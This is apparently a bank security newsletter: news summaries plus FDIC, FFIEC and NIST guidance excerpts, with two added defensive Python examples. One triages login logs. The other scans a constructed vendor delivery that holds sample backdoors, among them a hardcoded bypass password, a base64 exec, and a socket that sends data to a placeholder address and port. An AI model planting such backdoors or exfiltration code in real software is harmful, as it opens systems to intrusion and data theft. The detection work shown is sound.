FYI - Tips for those of all ages interested in pursuing a career in
cybersecurity - Today, we are facing a frightening shortage of
cybersecurity professionals in the workforce. According to
Cybersecurity Ventures, this widening gap is expected to leave 3.5
million cybersecurity jobs unfilled by 2021.
https://www.scmagazine.com/home/opinion/executive-insight/tips-for-those-of-all-ages-interested-in-pursuing-a-career-in-cybersecurity/
Hacker Plants Keylogger Devices on Company Systems, Faces 12yr in
Jail - A hacker admitted to planting hardware keyloggers on
computers belonging to two companies to gain unauthorized access to
their networks and steal proprietary data.
https://www.bleepingcomputer.com/news/security/hacker-plants-keylogger-devices-on-company-systems-faces-12yr-in-jail/
Global insurers face quiet strain from hacker ransom demands -
Global insurers that cover cyberattacks are facing more claims
related to ransom-demanding hackers who cripple businesses’
technology systems, and only stop after receiving substantial
payments.
https://www.reuters.com/article/us-usa-ransomware-insurance/global-insurers-face-quiet-strain-from-hacker-ransom-demands-idUSKBN1X41E3
The Ransomware Superhero of Normal, Illinois - Thanks to Michael
Gillespie, an obscure programmer at a Nerds on Call repair store,
hundreds of thousands of ransomware victims have recovered their
files for free.
https://www.propublica.org/article/the-ransomware-superhero-of-normal-illinois
We interviewed cyber experts on a Vegas ferris wheel. Then ride
security showed up… - In the film “Ocean’s 11,” Danny Ocean and his
team of expert cybercriminals execute a daring casino heist in
glitzy Las Vegas.
https://www.scmagazine.com/home/network-security/we-interviewed-leading-cyber-experts-on-the-worlds-tallest-ferris-wheel-then-security-showed-up/
ATTACKS, INTRUSIONS, DATA THEFT & LOSS
FYI - AWS Left Reeling After Eight-Hour DDoS - Amazon Web Services (AWS)
customers were hit by severe outages yesterday after an apparent
DDoS attack took S3 and other services offline for up to eight
hours.
https://www.infosecurity-magazine.com/news/aws-customers-hit-by-eighthour-ddos/
Antivirus hid more than 9,000 'cybercrime' reports from UK cops,
says watchdog - Just one of Britain's 43 police forces treats online
crime as a priority – while the Action Fraud organisation managed to
withhold 9,000 so-called cyber-crime reports from cops thanks to
badly configured antivirus on its reporting portal, according to a
government watchdog.
https://www.theregister.co.uk/2019/10/24/hmicfrs_report_cyber_crime/
Johannesburg's city e-services disrupted by ransomware strike - A
threat actor that calls itself the "Shadow Kill Hackers" has
executed a data breach and ransomware attack against the City of
Johannesburg, South Africa, the second time in four months that the
metropolis has contended with a cyber extortion plot.
https://www.scmagazine.com/home/security-news/ransomware/johannesburgs-city-e-services-disrupted-by-ransomware-strike/
Skimming malware found on American Cancer Society’s online store -
One Magecart group decided that helping cancer victims is not enough
of a reason to deter them from hitting the American Cancer Society’s
online store with skimming malware.
https://www.scmagazine.com/home/retail/skimming-malware-found-on-american-cancer-societys-online-store/
Adobe leaves Creative Cloud database open, 7.5 million users exposed
- An unsecured Elasticsearch database left exposed the account
information of about 7.5 million Adobe Creative Cloud users.
https://www.scmagazine.com/home/security-news/data-breach/adobe-leaves-creative-cloud-database-open-7-5-million-users-exposed/
St. Louis health center stymied by September ransomware attack -
Betty Jean Kerr People’s Health Centers, a St. Louis-area medical
and social services provider, was victimized last September by a
ransomware attack that continues to prevent access to data collected
from patients, health care providers and employees.
https://www.scmagazine.com/home/security-news/ransomware/st-louis-health-center-stymied-by-september-ransomware-attack/
City of Johannesburg held for ransom by hacker gang - A group named
"Shadow Kill Hackers" is asking local officials for 4 bitcoins or
they'll release city data online.
https://www.zdnet.com/article/city-of-johannesburg-held-for-ransom-by-hacker-gang/
UniCredit Breach Affects Three Million Records - Italian bank
UniCredit has identified a breach of its IT systems affecting
millions of customer records, according to breaking reports.
https://www.infosecurity-magazine.com/news/unicredit-breach-affects-three/
Bed Bath & Beyond declares data incident - Home goods retailer Bed
Bath & Beyond yesterday disclosed in a Securities & Exchange
Commission 8-K filing that an unauthorized third party illegally
accessed one percent of its online customers’ accounts.
https://www.scmagazine.com/home/security-news/cybercrime/bed-bath-beyond-declares-data-incident/
WEB SITE COMPLIANCE - We continue the series on the FDIC Supervisory
Insights article on Incident Response Programs. (7 of 12)
Define what constitutes an incident.
An initial step in the development of a response program
is to define what constitutes an incident. This step is important as
it sharpens the organization's focus and delineates the types of
events that would trigger the use of the IRP. Moreover, identifying
potential security incidents can also make the possible threats seem
more tangible, and thus better enable organizations to design
specific incident-handling procedures for each identified threat.
Detection
The ability to detect that an incident is occurring or has
occurred is an important component of the incident response process.
This is considerably more important with respect to technical
threats, since these can be difficult to identify without the
proper technical solutions in place. If an institution is not
positioned to quickly identify incidents, the overall effectiveness
of the IRP will suffer. Following are two detection-related best
practices included in some institutions' IRPs.
Identify indicators of unauthorized system access.
Most banks implement some form of technical solution,
such as an intrusion detection system or a firewall, to assist in
the identification of unauthorized system access. Activity reports
from these and other technical solutions (such as network and
application security reports) serve as inputs for the monitoring
process and for the IRP in general. Identifying potential indicators
of unauthorized system access within these activity or security
reports can assist in the detection process.
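What "identifying indicators of unauthorized system access within activity reports" looks like in practice, as an added example that is not part of the FDIC guidance or this newsletter: a small triage pass over authentication log lines that flags three indicators an IRP commonly names (a success following a run of failures, an external login outside business hours, and a known user appearing from a source never seen before). The log format, host names, addresses, business-hours window and internal address prefix are all constructed assumptions for the example.

```python
"""Triage of authentication activity for indicators of unauthorized access.

Added example, not code from the FDIC guidance. The log lines below are
constructed in a simplified sshd-like key=value format; real reports will
need their own parser, but the indicator logic is the same.
"""
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample log lines (not real data).
SAMPLE_LOG = """\
2019-10-24T02:11:03 host=db01 user=admin src=203.0.113.9 result=FAIL
2019-10-24T02:11:05 host=db01 user=admin src=203.0.113.9 result=FAIL
2019-10-24T02:11:08 host=db01 user=admin src=203.0.113.9 result=FAIL
2019-10-24T02:11:10 host=db01 user=admin src=203.0.113.9 result=FAIL
2019-10-24T02:11:12 host=db01 user=admin src=203.0.113.9 result=FAIL
2019-10-24T02:11:15 host=db01 user=admin src=203.0.113.9 result=OK
2019-10-24T09:30:00 host=web01 user=jsmith src=10.0.5.21 result=OK
2019-10-24T10:02:44 host=web01 user=jsmith src=10.0.5.21 result=OK
2019-10-24T23:40:00 host=web01 user=jsmith src=198.51.100.7 result=OK
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) "
    r"src=(?P<src>\S+) result=(?P<result>OK|FAIL)$"
)

FAIL_THRESHOLD = 5             # assumed: this many failures before a success
BUSINESS_HOURS = range(7, 20)  # assumed: 07:00-19:59 local time
INTERNAL_NET = "10."           # assumed: internal address prefix


def parse(text):
    """Parse log text into event dicts; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        d["ts"] = datetime.fromisoformat(d["ts"])
        events.append(d)
    return events


def find_indicators(events):
    """Return (indicator, user, src, timestamp) tuples in log order."""
    indicators = []
    fails = defaultdict(int)     # (host, user, src) -> consecutive failures
    seen_src = defaultdict(set)  # user -> sources with a prior successful login
    for e in events:
        key = (e["host"], e["user"], e["src"])
        if e["result"] == "FAIL":
            fails[key] += 1
            continue
        # Successful login: evaluate it against the accumulated context.
        if fails[key] >= FAIL_THRESHOLD:
            indicators.append(("brute_force_success", e["user"], e["src"], e["ts"]))
        fails[key] = 0
        external = not e["src"].startswith(INTERNAL_NET)
        if external and e["ts"].hour not in BUSINESS_HOURS:
            indicators.append(("external_off_hours_login", e["user"], e["src"], e["ts"]))
        if seen_src[e["user"]] and e["src"] not in seen_src[e["user"]]:
            indicators.append(("new_source_for_user", e["user"], e["src"], e["ts"]))
        seen_src[e["user"]].add(e["src"])
    return indicators


def triage(text=SAMPLE_LOG):
    """Run the full pass; this is what an IRP monitoring step would call."""
    return find_indicators(parse(text))


if __name__ == "__main__":
    for name, user, src, ts in triage():
        print(f"{ts.isoformat()} {name:<26} user={user} src={src}")
```

On the constructed input the pass reports four indicators: the admin login that succeeded after five failures (and happened at 02:11 from an external address), and the jsmith login at 23:40 from an address that user had never used before. The thresholds are the part an institution tunes; the point of the exercise is that each indicator maps to a specific event type the IRP has already defined as worth responding to.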
FFIEC IT SECURITY - We continue our series on the FFIEC interagency
Information Security Booklet.
SYSTEMS DEVELOPMENT, ACQUISITION, AND MAINTENANCE -
SOFTWARE DEVELOPMENT AND ACQUISITION
Outsourced Development
Many financial institutions outsource software development to
third parties. Numerous vendor management issues exist when
outsourcing software development. The vendor management program
established by management should address the following:
! Verifying credentials and contracting only with reputable
providers;
! Evaluating the provider's secure development environment,
including background checks on its employees and code development
and testing processes;
! Obtaining fidelity coverage;
! Requiring signed nondisclosure agreements to protect the
financial institution's rights to source code and customer data as
appropriate;
! Establishing security requirements, acceptance criteria, and
test plans;
! Reviewing and testing source code for security vulnerabilities,
including covert channels or backdoors that might conceal
unauthorized access into the system;
! Restricting any vendor access to production source code and
systems and monitoring their access to development systems; and
! Performing security tests to verify that the security
requirements are met before implementing the software in production.
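One concrete form the "reviewing and testing source code for ... backdoors" item can take before a vendor delivery reaches the test environment, as an added example that is neither FFIEC text nor any real vendor's code: a small static gate over the delivered files that flags cheap textual indicators of hardcoded credentials, decode-then-execute payloads, literal remote endpoints, and authentication bypasses keyed to a fixed user name. The delivery contents, rule set and file names are constructed for the example; the checks complement a manual review and are not a substitute for one.

```python
"""Acceptance gate for a vendor-delivered source tree.

Added example, not from the FFIEC booklet. Scans constructed source files
for simple indicators of backdoors or covert access paths and blocks
promotion to the test environment until each finding is reviewed.
"""
import re

# Constructed vendor delivery (not real code): path -> source text.
DELIVERY = {
    "app/auth.py": (
        "def login(user, pw):\n"
        "    if user == 'support' and pw == 'Let-Me-In-2019':  # vendor hotline\n"
        "        return True\n"
        "    return check_db(user, pw)\n"
    ),
    "app/util.py": (
        "import base64\n"
        "payload = 'aW1wb3J0IG9z'\n"
        "exec(base64.b64decode(payload))\n"
    ),
    "app/report.py": (
        "import socket\n"
        "def send(data):\n"
        "    s = socket.create_connection(('198.51.100.23', 4444))\n"
        "    s.sendall(data)\n"
    ),
    "app/models.py": "class Account:\n    pass\n",
}

# Each rule is (name, regex). Patterns are kept simple on purpose so a
# reviewer can see exactly why a line was flagged; tune them per language.
RULES = [
    ("hardcoded_credential",
     re.compile(r"""(pass(word|wd)?|pw|secret|token)\s*==\s*['"][^'"]+['"]""", re.I)),
    ("decode_then_exec",
     re.compile(r"\b(exec|eval)\s*\(\s*.*b64decode", re.I)),
    ("literal_remote_endpoint",
     re.compile(r"""['"](\d{1,3}\.){3}\d{1,3}['"]\s*,\s*\d+""")),
    ("bypass_comparison_with_literal_user",
     re.compile(r"""user\w*\s*==\s*['"][^'"]+['"]\s+and\s+""")),
]


def scan(delivery):
    """Return (path, line_no, rule_name, line_text) for every rule hit."""
    findings = []
    for path, text in delivery.items():
        for n, line in enumerate(text.splitlines(), 1):
            for name, rx in RULES:
                if rx.search(line):
                    findings.append((path, n, name, line.strip()))
    return findings


def gate(delivery):
    """Acceptance decision: any finding blocks promotion until reviewed."""
    findings = scan(delivery)
    return {"accepted": not findings, "findings": findings}


if __name__ == "__main__":
    result = gate(DELIVERY)
    for path, n, name, line in result["findings"]:
        print(f"{path}:{n}: {name}: {line}")
    print("accepted" if result["accepted"] else "blocked pending review")
```

Run against the constructed delivery, the gate blocks on four findings: the fixed support user and password in auth.py (two rules fire on the same line), the base64-decoded exec in util.py, and the literal address and port in report.py. A gate like this is only the first, cheap layer; the booklet's later item on security testing before production is where the behavioural checks belong.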
NATIONAL INSTITUTE OF STANDARDS AND TECHNOLOGY - We continue the
series on the National Institute of Standards and Technology (NIST)
Handbook.
Section I. Introduction & Overview - Chapter 1 INTRODUCTION - 1.3
Organization
The first section of the handbook contains background and overview
material, briefly discusses threats, and explains the roles and
responsibilities of individuals and organizations involved in
computer security. It explains the
executive principles of computer security that are used throughout
the handbook. For example, one important principle that is
repeatedly stressed is that only security measures that are
cost-effective should be implemented. A familiarity with the
principles is fundamental to understanding the handbook's
philosophical approach to the issue of security.
The next three major sections deal with security controls:
Management Controls (II), Operational Controls (III), and Technical
Controls (IV). Most
controls cross the boundaries between management, operational, and
technical. Each chapter in the three sections provides a basic
explanation of the control; approaches to implementing the control,
some cost considerations in selecting, implementing, and using the
control; and selected interdependencies that may exist with other
controls. Each chapter in this portion of the handbook also provides
references that may be useful in actual implementation.
! The Management Controls section addresses security
topics that can be characterized as managerial. They are techniques
and concerns that are normally addressed by management in the
organization's computer security program. In general, they focus on
the management of the computer security program and the management
of risk within the organization.
! The Operational Controls section addresses security
controls that are, broadly speaking, implemented and executed by
people (as opposed to systems). These controls are put in place to
improve the security of a particular system (or group of systems).
They often require technical or specialized expertise, and often
rely upon management activities as well as technical controls.
! The Technical Controls section focuses on security
controls that the computer system executes. These controls are
dependent upon the proper functioning of the system for their
effectiveness. The implementation of technical controls, however,
always requires significant operational considerations -- and should
be consistent with the management of security within the
organization.
Finally, an example is presented to aid the reader in correlating
some of the major topics discussed in the handbook. It describes a
hypothetical system and discusses some of the controls that have
been implemented to protect it. This section helps the reader better
understand the decisions that must be made in securing a system, and
illustrates the interrelationships among controls.
Definition of Sensitive Information
Many people think that sensitive information only requires
protection from unauthorized disclosure. However, the Computer
Security Act provides a much broader definition of the term
"sensitive" information:
"any information, the loss, misuse, or unauthorized access to or
modification of which could adversely affect the national interest
or the conduct of federal programs, or the privacy to which
individuals are entitled under section 552a of title 5, United
States Code (the Privacy Act), but which has not been specifically
authorized under criteria established by an Executive Order or an
Act of Congress to be kept secret in the interest of national
defense or foreign policy."
The above definition can be contrasted with the long-standing
confidentiality-based information classification system for national
security information (i.e., CONFIDENTIAL, SECRET, and TOP SECRET).
This system is based only upon the need to protect classified
information from unauthorized disclosure; the U.S. Government does
not have a similar system for unclassified information. No
government wide schemes (for either classified or unclassified
information) exist which are based on the need to protect the
integrity or availability of information.